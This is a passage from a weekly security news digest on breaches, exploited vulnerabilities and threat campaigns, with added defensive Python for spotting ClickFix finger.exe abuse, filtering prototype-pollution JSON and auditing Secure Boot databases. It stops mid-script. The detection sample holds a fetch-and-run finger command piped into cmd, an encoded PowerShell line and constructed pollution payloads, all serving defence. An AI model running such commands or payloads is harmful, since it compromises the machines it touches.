In a week that tested digital trust at every layer, the headlines were dominated by high-profile breaches, actively exploited zero-days, and brazen nation-state operations.
ShinyHunters claimed to have breached the analytics provider Mixpanel and walked away with behavioral and session events tied to Pornhub Premium users, data dating from before the platform stopped using Mixpanel in 2021. Pornhub says no passwords, payment details, or government IDs were exposed, but even stale viewing analytics are potent fuel for phishing and extortion against a uniquely sensitive user base, and the incident reignites the debate over third-party risk management and how long vendors should be allowed to retain such data.
Meanwhile, Cisco confirmed active exploitation of an unpatched zero-day (CVE-2025-20393) in AsyncOS, the operating system behind its Secure Email Gateway and Secure Email and Web Manager appliances. Attackers abuse weak input validation to run system-level commands remotely and implant “AquaShell,” a Python-based backdoor buried in the appliances’ web components that accepts unauthenticated HTTP POST requests.
With no patch available at press time, Cisco has issued hardening guidance rather than a fix, and security teams are urged to lock down management access to these appliances, segment them from the rest of the network, and hunt for AquaShell indicators. An email gateway that sits in the path of every inbound message is a perimeter device in its own right, and this flaw shows how fragile that perimeter is.
Adding geopolitical intrigue, Amazon unmasked a North Korean operative who had been posing as a U.S.-based systems administrator for one of its contractors. The tell was not a phishing lure or a malware alert but timing: commands that should have crossed the network in under 100 milliseconds were consistently arriving after more than 110, evidence that a laptop physically located in Arizona was being driven from overseas.
The case fits the broader DPRK “remote IT worker” scheme, which relies on fabricated identities, templated resumes, and U.S.-based laptop farms to dodge sanctions and route salaries into weapons programs. Amazon reports blocking more than 1,800 suspected North Korean job attempts since April 2024, with the rate climbing roughly 27% per quarter, and is pressing for deeper vetting and telemetry-based location checks in remote hiring.
Beyond these headlines, this week’s digest covers the Gentlemen ransomware family and the alliance structure forming around Qilin, actively exploited FortiCloud SSO bypasses on Fortinet appliances, Chrome’s December security update, privilege-escalation bugs in Plesk, JumpCloud Remote Assist, and Windows Admin Center, CISA and NSA guidance on auditing UEFI Secure Boot, and Let’s Encrypt’s road to 45-day certificates, along with the mitigation steps each one calls for.
Cyber Threats
Gentlemen Ransomware Targets Enterprise Networks
Gentlemen ransomware, first spotted in August 2025, is rapidly becoming one of the most active emerging ransomware families, hitting medium and large enterprises across at least 17 countries and sectors such as healthcare, manufacturing, and insurance. The group runs a double-extortion model, exfiltrating sensitive data before encrypting it, and leans on Go-based cross-platform payloads, Group Policy Object (GPO) abuse, and bring-your-own-vulnerable-driver (BYOVD) techniques to disable defenses and spread laterally. The encryptor refuses to run without a valid --password argument, uses X25519 for key exchange and XChaCha20 for file encryption, and encrypts only selected segments of each file for speed (intermittent encryption) while dropping README-GENTLEMEN.txt ransom notes in affected directories.
Read more: https://cybersecuritynews.com/new-gentlemen-ransomware-breaching-corporate-networks/
Storm-0249: From Mass Phishing to Stealth IAB
Storm-0249 has evolved from a noisy mass-phishing operation into a stealthy initial access broker (IAB) that sells ransomware-ready footholds, in line with the broader cybercrime-as-a-service trend. The group now abuses trusted EDR binaries such as SentinelOne’s SentinelAgentWorker.exe for DLL sideloading, letting a signed executable load its malicious library so that persistence runs under an allow-listed, high-trust process. Intrusions typically begin with ClickFix-style social engineering and malicious MSI packages, after which Storm-0249 performs reconnaissance, keys its payload encryption to machine identifiers so samples only decrypt on the intended host, and sidesteps detections that rely on suspicious command lines.
Read more: https://cybersecuritynews.com/storm-0249-abusing-edr-process/
ClickFix Campaign Abuses finger.exe and Fake CAPTCHAs
A new ClickFix variant weaponizes the legacy Windows finger.exe client and fake CAPTCHA pages to deliver multi-stage malware. Victims are coached into pasting and running a finger command (for example, finger gcaptcha@captchaver[.]top), which fetches attacker-controlled text from the remote host over TCP port 79; that text is piped into the command interpreter, where a PowerShell stage decodes and runs Base64-encoded payloads to establish a foothold. Campaigns such as KongTuke and SmartApeSG rely on the fact that many environments neither monitor nor block port 79 traffic, turning a long-forgotten protocol into an effective initial access vector.
Read more: https://cybersecuritynews.com/new-clickfix-attack-exploits-finger-exe-tool/
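The chain above boils down to two observable events: finger.exe contacting a remote host on TCP/79, and a PowerShell process with an encoded command spawned underneath the command that invoked it. The following Python, an example added here rather than code from the article or from the campaigns it describes, runs that logic over a few constructed EDR-style process and network records; the field names, PIDs and destination IP are assumptions, and only the defanged domain is taken from the text.

```python
"""Detection logic for the finger.exe ClickFix chain.

Added example, not code from the original article or from the campaigns it
describes. It runs over a few constructed process-creation and network-flow
records shaped like EDR telemetry; the field names, PIDs and IP addresses
are assumptions, and the defanged domain comes from the article.
"""
import re

# Constructed sample telemetry (not from a real incident). PID 4120 is the
# victim's pasted command; 4122 and 4130 are its children; 5001 and 5002 are
# benign uses of the same binaries that must not alert.
PROCESS_EVENTS = [
    {"pid": 4120, "ppid": 3001, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c finger gcaptcha@captchaver[.]top | more +1 | cmd"},
    {"pid": 4122, "ppid": 4120, "image": r"C:\Windows\System32\finger.exe",
     "cmdline": "finger gcaptcha@captchaver[.]top"},
    {"pid": 4130, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"pid": 5001, "ppid": 900, "image": r"C:\Windows\System32\finger.exe",
     "cmdline": "finger"},  # bare finger lists local users, no network
    {"pid": 5002, "ppid": 901,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\inventory.ps1"},  # routine admin script
]
NETWORK_EVENTS = [
    {"pid": 4122, "dst": "203.0.113.10", "dport": 79, "proto": "tcp"},  # assumed IP
    {"pid": 5002, "dst": "10.0.0.5", "dport": 443, "proto": "tcp"},
]

# finger asked about user@host will open TCP/79 to that host.
FINGER_REMOTE = re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+", re.IGNORECASE)
# PowerShell -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_PS = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)


def is_remote_finger(cmdline):
    """True when the command line queries a remote finger server."""
    return FINGER_REMOTE.search(cmdline) is not None


def is_encoded_powershell(image, cmdline):
    """True for powershell.exe launched with an encoded command."""
    return image.lower().endswith("powershell.exe") and ENCODED_PS.search(cmdline) is not None


def detect(process_events, network_events):
    """Return one alert dict per rule hit.

    finger_remote_query  - any finger invocation that targets user@host
    finger_to_powershell - encoded PowerShell whose parent ran a remote finger query
    tcp79_outbound       - any TCP connection to port 79
    """
    alerts = []
    by_pid = {ev["pid"]: ev for ev in process_events}
    for ev in process_events:
        if is_remote_finger(ev["cmdline"]):
            alerts.append({"rule": "finger_remote_query", "pid": ev["pid"], "cmdline": ev["cmdline"]})
        if is_encoded_powershell(ev["image"], ev["cmdline"]):
            parent = by_pid.get(ev["ppid"])
            if parent is not None and is_remote_finger(parent["cmdline"]):
                alerts.append({"rule": "finger_to_powershell", "pid": ev["pid"], "parent_pid": parent["pid"]})
    for flow in network_events:
        if flow["proto"] == "tcp" and flow["dport"] == 79:
            alerts.append({"rule": "tcp79_outbound", "pid": flow["pid"], "dst": flow["dst"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(PROCESS_EVENTS, NETWORK_EVENTS):
        print(alert)
```

The parent-child rule is the one worth keeping even after you block port 79 at the egress: ClickFix lures rotate the fetch mechanism, but a user-pasted one-liner that ends in encoded PowerShell under cmd.exe looks the same regardless of how the payload arrived.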
PCPcat React2Shell Exploitation Hits 59,000+ Next.js Servers
The PCPcat campaign compromised more than 59,000 servers in under 48 hours by exploiting vulnerabilities in Next.js and React (CVE-2025-29927 and CVE-2025-66478), together dubbed React2Shell, for unauthenticated remote code execution. The attacks use prototype pollution and command injection delivered in specially crafted JSON payloads to hijack the Node.js child-process execution chain, then exfiltrate .env files, cloud keys, SSH credentials, and shell histories before deploying GOST and FRP for persistent tunneling. PCPcat’s C2, centered on 67.217.57.240 over ports 666, 888, and 5656, coordinates high-frequency scanning batches and installs redundant systemd services so compromised servers stay in the botnet across reboots.
Read more: https://cybersecuritynews.com/new-pcpcat-exploiting-react2shell-vulnerability/
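Prototype pollution rides in on keys such as `__proto__` or `constructor.prototype` inside otherwise ordinary JSON; once a naive deep-merge copies them onto Object.prototype, every later object that leaves a property unset (for example the options handed to a child-process call) inherits the attacker’s value. The Python below is an added example, not code from the article, Next.js or React: an ingress-side check that decodes a request body and reports the paths of such keys, including ones hidden behind JSON unicode escapes. The payloads are constructed. It buys time before patching; it is not a substitute for the vendor fixes.

```python
"""Ingress check for prototype-pollution keys in JSON request bodies.

Added example, not code from the original article, from Next.js or from
React; it is a defensive pre-filter of the kind you might run at a reverse
proxy while patching is under way. All payloads below are constructed.
"""
import json


def pollution_paths(value, path=""):
    """Return the JSON paths of keys a naive JavaScript deep-merge would
    follow onto Object.prototype: any `__proto__` key, and the
    `constructor` -> `prototype` chain. A bare `constructor` key is left
    alone because it is common in legitimate data; only the chain matters."""
    hits = []
    if isinstance(value, dict):
        for key, child in value.items():
            here = f"{path}.{key}" if path else key
            if key == "__proto__":
                hits.append(here)
            elif key == "constructor" and isinstance(child, dict) and "prototype" in child:
                hits.append(f"{here}.prototype")
            hits.extend(pollution_paths(child, here))
    elif isinstance(value, list):
        for idx, child in enumerate(value):
            hits.extend(pollution_paths(child, f"{path}[{idx}]"))
    return hits


def inspect_body(raw_body):
    """Decode first, then inspect. JSON escapes such as \\u005f\\u005fproto\\u005f\\u005f
    decode to __proto__, so a regex over the raw bytes would miss them."""
    try:
        data = json.loads(raw_body)
    except ValueError as exc:
        return {"verdict": "reject", "reason": f"not JSON: {exc}", "paths": []}
    paths = pollution_paths(data)
    return {"verdict": "block" if paths else "allow", "reason": "", "paths": paths}


# Constructed payloads: one benign body and three pollution attempts.
BENIGN = '{"user": {"name": "alice", "constructor": "acme"}}'
PROTO_KEY = '{"user": {"name": "alice", "__proto__": {"shell": true}}}'
CTOR_CHAIN = '{"items": [{"constructor": {"prototype": {"polluted": 1}}}]}'
ESCAPED = '{"\\u005f\\u005fproto\\u005f\\u005f": {"x": 1}}'

if __name__ == "__main__":
    for name, body in [("benign", BENIGN), ("proto", PROTO_KEY),
                       ("ctor", CTOR_CHAIN), ("escaped", ESCAPED)]:
        print(name, inspect_body(body))
```

Run it in front of the application, not inside it: by the time the framework has merged the body, the damage is done. Because the check works on the decoded structure it also catches keys split across nested arrays and objects, which is where scanners that grep the raw body for the literal string `__proto__` fall short.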
Weaponized SVGs, Office Docs, and Multi-Stage Loaders
Researchers have detailed a sophisticated phishing wave targeting manufacturing and government entities in Italy, Finland, and Saudi Arabia using weaponized Office documents, malicious SVGs, and ZIP/LNK chains to deliver a shared commodity loader. The multi-stage pipeline relies on obfuscated JavaScript, WMI-launched PowerShell, PNG-based steganography for .NET assemblies, trojanized TaskScheduler libraries, and process hollowing into RegAsm.exe, ultimately dropping stealers and RATs such as PureLog, Katz Stealer, DCRat, AsyncRAT, and Remcos. Defensive guidance emphasizes disabling the legacy Equation Editor (CVE-2017-11882), tightening email filtering, scrutinizing image attachments (an SVG can carry script as well as shapes), and monitoring for suspicious PowerShell execution patterns.
Read more: https://cybersecuritynews.com/hackers-weaponize-svg-files-and-office-documents/
BlueDelta Targets Ukrainian UKR.NET Users
Russian state-backed group BlueDelta (APT28/Fancy Bear/Forest Blizzard) is running a credential-harvesting campaign against users of the popular Ukrainian webmail and news service UKR.NET. Attackers send PDFs that link to fake login portals hosted on services like Mocky and DNS EXIT, then chain link shorteners, ngrok/Serveo tunnels, and multi-layer infrastructure to steal usernames, passwords, 2FA codes, and IP addresses while masking the true C2 locations. Updated JavaScript even suppresses ngrok’s interstitial browser warning by adding the ngrok-skip-browser-warning header to its requests, and researchers counted at least 42 distinct credential-harvesting chains over the campaign period.
Read more: https://cybersecuritynews.com/bluedelta-hackers-attacking-users/
Solar Panel Systems at Risk of Remote Manipulation
Recent research shows that Internet-connected solar and energy management systems can be remotely manipulated, enabling attackers to disrupt power generation, alter reported metrics, or leverage access for lateral movement into operational environments. Misconfigurations, default credentials, and exposed management interfaces create an attack surface where adversaries could potentially coordinate large-scale grid-impacting actions or monetize control through extortion. Operators are urged to harden remote access, segment OT from IT networks, and enforce strong authentication on all cloud and web interfaces tied to power infrastructure.
Read more: https://cybersecuritynews.com/hackers-can-manipulate-internet-based-solar-panel-systems/
Qilin–Allied Operations and RaaS Ecosystem Shifts
New research into the Qilin ransomware ecosystem highlights an expanding alliance structure that integrates access brokers, infrastructure providers, and data-leak facilitators around the core RaaS operation. These alliances streamline end-to-end attack workflows—from initial compromise and privilege escalation to data theft, extortion site hosting, and negotiation support—reducing barriers for less skilled affiliates while increasing campaign volume. Organizations are advised to focus on upstream controls such as brokered access detection, monitoring of emerging leak domains, and tighter visibility into cross-actor infrastructure reuse.
Read more: https://cybersecuritynews.com/new-research-uncovers-the-alliance-between-qilin/
Vulnerability
CISA Flags Legacy Sierra Wireless Routers
CISA added a legacy Sierra Wireless AirLink ALEOS vulnerability (CVE-2018-4063) to its Known Exploited Vulnerabilities catalog after evidence of active exploitation. The flaw is an unrestricted file upload issue in the web interface that allows authenticated attackers (often via default or weak credentials) to upload malicious files and achieve remote code execution on the router, enabling persistent footholds and lateral movement into internal networks. Because impacted hardware is End-of-Life with no security patches, CISA urges federal agencies and enterprises to fully decommission and remove these devices rather than attempting to harden them in place.
Read more: https://cybersecuritynews.com/cisa-adds-sierra-router-vulnerability/
Critical Plesk Bug Gives Users Root Access
A severe local privilege escalation vulnerability in Plesk for Linux (CVE-2025-66430) allows any authenticated Plesk user with access to the “Password-Protected Directories” feature to escalate to root on affected servers. The issue stems from improper handling of user input, enabling attackers to inject arbitrary data into the Apache configuration Plesk generates and execute commands with root privileges, leading to full server takeover, data theft, malware deployment, and lateral movement. Plesk has released fixes and micro-updates for Plesk Obsidian 18.0.70 through 18.0.74, and administrators are urged to apply them immediately, restrict access to the feature, and monitor logs for suspicious configuration changes.
Read more: https://cybersecuritynews.com/plesk-vulnerability/
NVIDIA Merlin Deserialization Flaws Threaten AI Workloads
Two high-severity deserialization vulnerabilities in NVIDIA’s Merlin framework (CVE-2025-33213 and CVE-2025-33214) impact NVTabular’s Workflow and Transformers4Rec’s Trainer components on Linux. Insecure deserialization (CWE-502) could allow remote attackers with network access and minimal user interaction to execute malicious code, trigger denial-of-service conditions, exfiltrate sensitive data, and tamper with recommendation system pipelines used in large-scale AI deployments. NVIDIA has shipped security updates through the official Merlin and NVTabular repositories, and organizations running Merlin in production should promptly pull the latest versions, review deserialization usage, and limit untrusted data paths into ML workflows.
Read more: https://cybersecuritynews.com/nvidia-merlin-vulnerabilities/
JumpCloud Remote Assist Vulnerability Enables SYSTEM-Level Takeover
A high-severity local privilege escalation bug in JumpCloud Remote Assist for Windows (CVE-2025-34352) allows low-privileged users to gain NT AUTHORITY\SYSTEM privileges or crash endpoints. The agent’s uninstaller, running as SYSTEM, performs file create, write, delete, and execute operations in the user-controlled %TEMP% directory without sufficient validation, enabling race-condition and file-redirect attacks that lead to full endpoint compromise. JumpCloud has fixed the issue in Remote Assist agent version 0.317.0 and later, and organizations should verify all Windows endpoints are updated, audit for privileged operations in user-writable paths, and monitor for abnormal uninstall triggers or DoS attempts.
Read more: https://cybersecuritynews.com/jumpcloud-remote-assist-for-windows-agent-flaw/
FortiGate SSO Flaws Under Active Exploitation
Threat actors are actively exploiting two critical Fortinet authentication bypass vulnerabilities (CVE-2025-59718 and CVE-2025-59719) in FortiGate firewalls and related products’ FortiCloud SSO login. Crafted SAML messages allow unauthenticated attackers to bypass FortiCloud SSO and obtain administrative access to FortiGate, FortiWeb, FortiProxy, and FortiSwitchManager appliances when the feature is enabled, creating a direct path to configuration theft and network compromise. Fortinet has released patches and urges customers to immediately update, temporarily disable FortiCloud SSO where possible, restrict management interfaces to trusted networks, and reset stored credentials and review logs if any indicators of malicious SSO logins are observed.
Read more: https://cybersecuritynews.com/fortigate-devices-sso-vulnerabilities/
ScreenConnect Server Bug Exposes Config Data and Extensions
ConnectWise ScreenConnect server is affected by a critical vulnerability (CVE-2025-14265) that can let attackers expose sensitive configuration data and install untrusted extensions. The flaw, rooted in missing or weak code integrity checks during extension installation (CWE-494), affects ScreenConnect server versions prior to 25.8, though host and guest clients are not impacted. ConnectWise’s 25.8 update reinforces server-side validation and integrity checking for extensions, and on-prem administrators should upgrade immediately, review installed extensions, and assess logs for suspicious extension activity, while cloud-hosted instances have been patched automatically.
Read more: https://cybersecuritynews.com/screenconnect-vulnerability/
Windows Admin Center LPE via Writable ProgramData Paths
A newly disclosed local privilege escalation vulnerability in Windows Admin Center (CVE-2025-64669) impacts versions up to 2.4.2.1 and environments running WAC 2411 and earlier. Insecure permissions on directories such as C:\ProgramData\WindowsAdminCenter and C:\ProgramData\WindowsAdminCenterUpdater—writable by standard users but used by elevated services—allow attackers to hijack the uninstall and updater flows, drop malicious DLLs, and have them loaded as SYSTEM. Microsoft rated the issue as Important and delivered fixes via the December Patch Tuesday cycle, and defenders should update WAC gateways promptly, validate directory ACLs, and test exposure using vendor-provided validation scenarios to confirm mitigations.
Read more: https://cybersecuritynews.com/windows-admin-center-vulnerability/
Chrome December Security Update Fixes Critical RCE Bugs
Google released Chrome 143.0.7499.146/.147 for Windows and Mac and 143.0.7499.146 for Linux, addressing vulnerabilities that could lead to remote code execution. The update includes at least two high-severity fixes, among them CVE-2025-14765, a use-after-free in WebGPU that exposes users to drive-by exploitation via malicious web content. Enterprises should accelerate browser patch rollouts, enforce automatic updates, and consider tightening policies around WebGPU and other high-risk APIs, since browser memory-safety bugs of this kind remain highly attractive to advanced threat actors.
Read more: https://cybersecuritynews.com/chrome-security-update-dec/
Cisco AsyncOS Zero-Day Exploited with AquaShell Backdoor
Cisco is tracking active exploitation of an unpatched zero-day vulnerability (CVE-2025-20393) in AsyncOS powering Cisco Secure Email Gateway and Secure Email and Web Manager appliances. Attackers exploit weak input validation to execute system-level commands remotely and deploy “AquaShell,” a Python-based backdoor embedded into AsyncOS web components that listens for unauthenticated HTTP POST requests and executes encoded payloads. With no official patch yet, organizations must urgently apply Cisco’s hardening guidance, including configuration changes, network segmentation of email security appliances, strict access controls, and use of detection tooling to identify AquaShell indicators of compromise.
Read more: https://cybersecuritynews.com/cisco-asyncos-0-day-vulnerability/
Apache Commons Text RCE via Unsafe Interpolation
A critical remote code execution vulnerability in Apache Commons Text (CVE-2025-46295) affects versions prior to 1.10.0 and stems from the library’s string interpolation feature. When an application passes untrusted input through the default StringSubstitutor interpolator, attackers can embed lookups such as ${script:...}, ${dns:...}, or ${url:...} to execute arbitrary code or trigger attacker-controlled network interactions, affecting a wide range of Java applications that rely on the library for string processing. Organizations should inventory applications that use Commons Text, upgrade to at least version 1.10.0 (or 1.14.0 as some vendors recommend), treat interpolated data as untrusted, and add dependency-scanning controls to catch vulnerable versions early in the lifecycle.
Read more: https://cybersecuritynews.com/apache-commons-text-vulnerability/
Cyberattack
Android banking Trojan “Frogblight”
A new Android banking Trojan dubbed Frogblight is targeting Turkish users by masquerading as official government and popular apps (including court portals and Chrome) to steal banking credentials and personal data. Victims are lured via SMS about fake court cases that redirect to cloned government sites, where they download the malicious APK.
Once installed, Frogblight abuses extensive permissions (SMS read/write, storage, device info) and shows real government pages in an embedded WebView to appear legitimate. The malware injects JavaScript into the WebView to intercept user input, forces banking login flows, communicates with C2 via Retrofit/REST and later WebSockets, and persists with multiple Android services, while evading analysis via emulator checks and geofencing.
Read more: https://cybersecuritynews.com/new-android-malware-frogblight-mimics-as-official-government-websites/
GhostPairing: WhatsApp device-link hijacking
The GhostPairing attack is an account-takeover campaign that abuses WhatsApp’s legitimate device-linking flow and requires no password theft or software exploit. Attackers send lures from compromised or spoofed contacts with a “photo” link that leads to a fake Facebook-themed verification page.
When victims enter their phone number, the backend requests a legitimate WhatsApp pairing code and displays it with instructions to enter it in the real app, tricking users into approving the attacker’s browser as a linked device. The result is persistent, invisible access to all chats and media, and compromised accounts become propagation bots for the next wave of lures. Mitigation comes down to reviewing linked devices regularly, treating unsolicited pairing requests as hostile, and enabling WhatsApp’s two-step verification.
Read more: https://cybersecuritynews.com/new-ghostpairing-attack-let-attackers-gain-full-access/
Russian GRU hackers on the network edge
A Russian state-sponsored group linked to the GRU’s Sandworm/APT44 cluster is running a years-long campaign against Western critical infrastructure by abusing misconfigured network edge devices rather than focusing on zero-day exploits. The operators target exposed management interfaces on customer-managed appliances hosted on cloud platforms like AWS EC2, then maintain persistent interactive access.
Once they control an edge device, they capture passing authentication traffic to harvest credentials for cloud consoles, collaboration tools, and source repositories, later replaying them against victim services across the energy, telecom, and managed security sectors. The campaign underscores that weak configuration and monitoring of routers, VPNs, and virtual appliances now rival patchable vulnerabilities as prime initial-access vectors.
Read more: https://cybersecuritynews.com/russian-hackers-attacking-network-edge-devices/
BlindEagle is abusing internal email trust
The BlindEagle threat actor has launched a fresh cyber-espionage wave against Colombian government entities, this time sending from a compromised internal email account so that its messages pass SPF, DKIM, and DMARC checks rather than tripping them. From that foothold the attackers sent phishing messages dressed up as legitimate internal notifications about a fabricated labor lawsuit, weaponized with SVG attachments.
Opening the SVG leads victims through a complex, multi-stage infection chain that uses heavy obfuscation and legitimate web services to hide payload delivery and C2 communication. By pivoting from external spoofing to internal trust abuse, BlindEagle sharply increases deliverability and click-through rates, a challenge for organizations that rely solely on perimeter email controls.
Read more: https://cybersecuritynews.com/blindeagle-hackers-attacking-organization/
Chinese ShadowPad IIS listener C2 mesh
A Chinese state-aligned group (tracked as Earth Alux/REF7707) is deploying a custom ShadowPad IIS Listener module to convert compromised web servers into a distributed relay network. The operation begins with exploitation of ASP.NET ViewState deserialization and SharePoint flaws (often via leaked machine keys or unpatched endpoints) to gain remote code execution and full system compromise.
The custom IIS module registers dynamic URL listeners via the HttpAddUrl API, decrypts specially crafted HTTP requests, and silently handles C2 traffic while passing all other requests to the normal IIS worker, blending into legitimate web traffic. This design turns victim infrastructure into resilient C2 nodes, prioritizing long-term stealth and operational redundancy over noisy implants or standalone C2 servers.
Read more: https://cybersecuritynews.com/chinese-hackers-using-custom-shadowpad-iis-listener-module/
Data Breach
Jaguar Land Rover Employee Data Breach
Jaguar Land Rover confirmed that an August cyberattack exposed sensitive data belonging to current and former employees and contractors, including information used for payroll, benefits, and staff schemes that may extend to dependents. While JLR has not disclosed the exact attack vector, the incident crippled UK manufacturing plants for over a month, contributing to losses exceeding $890 million and inflating quarterly losses to £342 million ($442 million).
Regulators such as the UK ICO have been notified, and JLR is contacting affected individuals, offering a dedicated helpline and complimentary credit/identity monitoring services. The company maintains that no customer or vehicle data was impacted, but experts warn that exposed employee PII—likely including names, addresses, salaries, and National Insurance numbers—could fuel identity theft, targeted fraud, and extortion.
Read more: https://cybersecuritynews.com/jaguar-land-rover-employee-data-stolen/
Pornhub Premium Data Exposed via Mixpanel
ShinyHunters claimed responsibility for breaching Mixpanel, exposing a limited set of analytics events linked to Pornhub Premium users rather than Pornhub’s core infrastructure. The compromised data appears to involve legacy session and behavioral analytics events from before Pornhub stopped using Mixpanel in 2021, with no passwords, payment data, or government IDs reported as exposed.
Pornhub has launched an internal investigation, engaged cybersecurity experts, and urged users to watch for phishing, enable MFA, and avoid interacting with unsolicited messages claiming to be from the platform. Security experts note that, if claims of large-scale exposure of detailed viewing histories prove accurate, the impact could rival or exceed the 2016 Adult Friend Finder incident, especially given the potential for triple extortion and misuse of sensitive data to “poison” AI models.
Read more: https://cybersecuritynews.com/pornhub-breached/
Windows & Linux
MSMQ Patch Breaks IIS Queues (KB5071546)
Microsoft’s December 2025 security update KB5071546 (OS Build 19045.6691) is breaking Message Queuing (MSMQ) functionality for Windows 10 22H2 and Windows Server 2016/2019, especially in high-load clustered environments. Affected systems see MSMQ queues go dormant and IIS sites crash with “Insufficient resources to perform operation” despite adequate RAM and disk.
The disruption stems from tightened NTFS permissions on the MSMQ storage path C:\Windows\System32\MSMQ\storage, which strip write access from non-admin MSMQ users and cause message file creation failures. Until Microsoft ships a fix, admins are advised to avoid deploying KB5071546 on MSMQ-heavy environments or test carefully in staging while monitoring Microsoft’s advisory for updated guidance.
Read more: https://cybersecuritynews.com/message-queuing-functionality-iis-sites/
WSL Update Disrupts Enterprise VPS Access (KB5067036)
The October 28, 2025 non-security update KB5067036 (builds 26200.7019 and 26100.7019 preview) is breaking VPS access for Windows Subsystem for Linux users who rely on enterprise VPNs in mirrored networking mode. Users see “No route to host” errors inside WSL even though connectivity from the Windows host remains intact, disrupting access to corporate VPS resources and remote infrastructure.
The root cause is tied to third-party VPN virtual interfaces failing to respond to ARP requests, affecting clients like Cisco Secure Client (AnyConnect) and OpenVPN in enterprise environments. Microsoft is investigating with no patch ETA yet, and admins are temporarily working around the issue by disabling mirrored networking or switching WSL to bridged networking while testing updates in staging.
Read more: https://cybersecuritynews.com/windows-update-breaks-vps-access/
Global Microsoft Teams Messaging Outage
Microsoft Teams suffered a significant global outage on Friday, causing widespread messaging delays, failed deliveries, and degraded functionality across multiple regions during business hours. Reports surged around 2:30 PM ET (7:30 PM GMT), with users in the US, Europe, Australia, and Asia experiencing severe latency, file-sharing issues, and service instability.
Microsoft acknowledged the incident via its official status channels, directing admins to incident ID TM1200517 in the Microsoft 365 admin center, and indicated telemetry showed signs of recovery while root cause analysis continued. The outage coincided with reported impacts to other Microsoft 365 services such as Outlook and OneDrive in some regions, reinforcing the need for robust continuity plans when core collaboration platforms fail.
Read more: https://cybersecuritynews.com/microsoft-teams-down/
Microsoft 365 Baseline Security Mode Rolls Out
Microsoft has begun rolling out Baseline Security Mode across Microsoft 365 tenants, introducing a centralized dashboard in the M365 Admin Center to apply Microsoft-recommended security baselines to Office, SharePoint, Exchange, Teams, and Entra. Announced at Ignite 2025, this opt-in capability appears under Org Settings → Security & Privacy and is expected to reach most tenants globally by late January 2026, with government clouds following by March 2026.
Baseline Security Mode bundles 18–20 policies into three core areas, including 12 authentication controls that disable legacy protocols like basic auth and EWS while enforcing phishing-resistant MFA for admins via FIDO2 or passkeys. Additional file-protection controls restrict risky behaviors such as opening documents over insecure HTTP/FTP, using ActiveX or DDE, and keep vulnerable tools like Publisher disabled ahead of retirement, all with simulation and reporting options so admins can assess impact before enforcing.
Read more: https://cybersecuritynews.com/microsoft-baseline-security-mode/
Others
CISA & NSA Push UEFI Secure Boot Audits
CISA and NSA have released a new Cybersecurity Information Sheet urging enterprises to verify and actively manage UEFI Secure Boot configurations in response to boot-level threats such as the BlackLotus bootkit (CVE-2023-24932), the BootHole GRUB2 flaw, and PKFail, the widespread shipping of firmware that trusts leaked test Platform Keys. The guidance stresses that misconfigured keys, leftover test certificates, or a Secure Boot mode that is not actually enforcing can let attackers bypass boot-time checks and install stealthy firmware-level malware.
Admins are advised to confirm that Secure Boot is enforcing (for example with Confirm-SecureBootUEFI on Windows or mokutil --sb-state on Linux), export and review the PK, KEK, db, and dbx variables, and compare them against known-good baselines using NSA tooling. Recommended configurations include the vendor’s PK and KEK, the Microsoft 2011 and 2023 CAs in db, and a dbx that contains only revocation hashes, not test keys or permissive entries, with remediation via firmware resets, capsule updates, and tighter supply-chain checks.
Read more: https://cybersecuritynews.com/cisa-guidance-uefi-secure-boot/
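Exporting the variables is the easy half of that audit; the hard half is reading them. The Python below is an example added here, not the NSA tooling the guidance points to: it parses the EFI_SIGNATURE_LIST structures that make up db and dbx (as produced by `efi-readvar -v dbx -o dbx.esl`, or read from `/sys/firmware/efi/efivars/dbx-d719b2cb-3d3a-4596-a3bc-dad00e67656f` after stripping the kernel’s 4-byte attribute prefix) and flags dbx entries that are not SHA-256 revocation hashes. The sample blob is constructed with struct.pack and its owner GUID is made up.

```python
"""Parse and audit UEFI Secure Boot signature databases (db/dbx).

Added example, not the NSA or CISA tooling the guidance refers to. It walks
the EFI_SIGNATURE_LIST structures that `efi-readvar -v dbx -o dbx.esl` or the
Linux efivars filesystem hand back, and flags dbx entries that are not
revocation hashes. The sample blob is constructed with struct.pack; the
owner GUID in it is made up.
"""
import hashlib
import struct
import uuid

# Signature type GUIDs from the UEFI specification.
EFI_CERT_SHA256_GUID = uuid.UUID("c1c41626-504c-4092-aca9-41f936934328")
EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
TYPE_NAMES = {EFI_CERT_SHA256_GUID: "sha256", EFI_CERT_X509_GUID: "x509"}
# EFI_SIGNATURE_LIST header: SignatureType GUID, SignatureListSize,
# SignatureHeaderSize, SignatureSize (all little-endian).
ESL_HEADER = struct.Struct("<16sIII")


def load_efivar(path):
    """Read a variable from /sys/firmware/efi/efivars and drop the 4-byte
    attributes prefix the kernel prepends (efi-readvar output has no prefix)."""
    with open(path, "rb") as fh:
        return fh.read()[4:]


def parse_esl(blob):
    """Return (type_name, owner_guid, data) for every EFI_SIGNATURE_DATA entry
    across all signature lists in the blob, rejecting inconsistent sizes."""
    entries, off = [], 0
    while off < len(blob):
        if len(blob) - off < ESL_HEADER.size:
            raise ValueError("truncated EFI_SIGNATURE_LIST header")
        raw_type, list_size, hdr_size, sig_size = ESL_HEADER.unpack_from(blob, off)
        if list_size < ESL_HEADER.size + hdr_size or off + list_size > len(blob) or sig_size <= 16:
            raise ValueError("malformed EFI_SIGNATURE_LIST")
        sig_type = uuid.UUID(bytes_le=raw_type)
        body = blob[off + ESL_HEADER.size + hdr_size: off + list_size]
        if len(body) % sig_size:
            raise ValueError("signature list body is not a multiple of SignatureSize")
        for i in range(0, len(body), sig_size):
            owner = uuid.UUID(bytes_le=body[i:i + 16])  # SignatureOwner precedes the data
            entries.append((TYPE_NAMES.get(sig_type, str(sig_type)), owner, body[i + 16:i + sig_size]))
        off += list_size
    return entries


def audit_dbx(entries):
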